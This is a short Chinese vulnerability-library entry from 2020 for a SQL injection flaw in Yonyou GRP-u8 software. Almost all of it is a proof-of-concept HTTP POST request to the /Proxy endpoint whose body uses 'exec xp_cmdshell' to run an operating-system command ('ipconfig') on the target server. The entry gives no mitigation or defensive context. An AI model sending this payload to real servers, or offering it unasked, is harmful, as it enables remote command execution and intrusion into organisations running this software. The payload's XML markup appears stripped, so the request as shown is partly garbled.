用友 GRP-u8注入漏洞

—
title: ‘用友 GRP-u8注入漏洞’
date: Fri, 11 Sep 2020 15:08:00 +0000
draft: false
tags: [‘白阁-漏洞库’]
—

### 漏洞范围

GRP-u8

### 漏洞POC

“`
POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache

cVer=9.8.0&dp=XMLAS_DataRequestProviderNameDataSetProviderDataDataexec xp_cmdshell ‘ipconfig’
“`